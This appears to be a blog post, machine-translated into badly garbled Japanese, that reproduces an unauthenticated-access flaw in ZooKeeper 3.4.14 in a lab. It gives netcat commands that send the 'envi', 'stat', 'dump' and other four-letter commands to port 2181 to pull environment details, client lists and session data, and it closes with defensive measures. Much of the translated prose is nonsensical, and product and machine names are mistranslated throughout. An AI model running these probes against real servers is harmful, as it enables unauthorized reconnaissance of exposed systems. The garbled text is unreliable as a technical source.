ZooKeeperの不正アクセスの脆弱性生殖試験

0x00の脆弱性プロファイル

  • ZooKeeperのは、分散アプリケーションのための分散、オープンソースの連携サービスであるGoogleのチャビーのオープンソース実装で、HadoopのとHBaseのの重要な要素です。それは、分散アプリケーションのための一貫したサービスを提供することで機能が含ま提供:コンフィギュレーション・メンテナンス、ドメイン・ネーム・サービス、分散型の同期、グループ・サービスを。
  • ZooKeeperのは、デフォルトで有効になって2181、ポートではない任意のアクセス制御の状況を実施し、攻撃者が実行できるenviシステム名、Java環境を含め、機密情報コマンドシステムの多くを得ます。

ビルドには0x01環境

テスター:カーリー
ドローン:Ubuntuの
バージョン:飼育係-3.4.14

飼育係-3.4.14試験機ではとドローンがインストールされている
次のようにインストールコマンドは次のとおりです。

wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.4.14/zookeeper-3.4.14.tar.gz
tar -xzvf zookeeper-3.4.14.tar.gz 
cd zookeeper-3.4.14/conf
mv zoo_sample.cfg zoo.cfg
../bin/zkServer.sh start # 启动

ここに画像を挿入説明
ビルド成功~~デフォルトポート2181

0x02の脆弱性が証明します

サーバー環境を取得します。

echo envi|nc 192.168.246.130 2181

ここに画像を挿入説明

接続を試してみてください

./zkCli.sh -server  192.168.246.130 2181

ここに画像を挿入説明
しかし、問題は、直接接続されていませんでした
私は値しないすみません
ながら、または2181ポートまたはクローズに従事する。
ここに画像を挿入説明

0x03の悪用

ENVIのコマンドを実行して、システム名などの機密情報システム、Java環境の多くを取得します。
1、STAT:パフォーマンスとクライアント接続のリストの統計情報を表示します。

echo stat |ncat 127.0.0.1 2181

2、ruok:テストサーバーは、非エラー状態で実行されています。

echo ruok |ncat 127.0.0.1 2181

3、REQS:リスト未処理の要求。

echo reqs |ncat 127.0.0.1 2181

4、ENVI:サービス環境に関するより多くの情報を印刷します。

echo envi |ncat 127.0.0.1 2181

5、ダンプ:リストセッションと暫定ノードが未完成。

echo dump |ncat 127.0.0.1 2181

防衛の0x04の手段

1、他のポートのサービスを使用し、デフォルトポートのZooKeeperを変更します。
2、サービス制限ポリシーの送信元アドレスを設定し、アクセス制御を追加します。
3、ZooKeeperの認証設定の増加。

0x05のリファレンス

https://www.freebuf.com/column/170904.html
https://xz.aliyun.com/t/6103#toc-7

おすすめ

転載: www.cnblogs.com/0nc3/p/12061726.html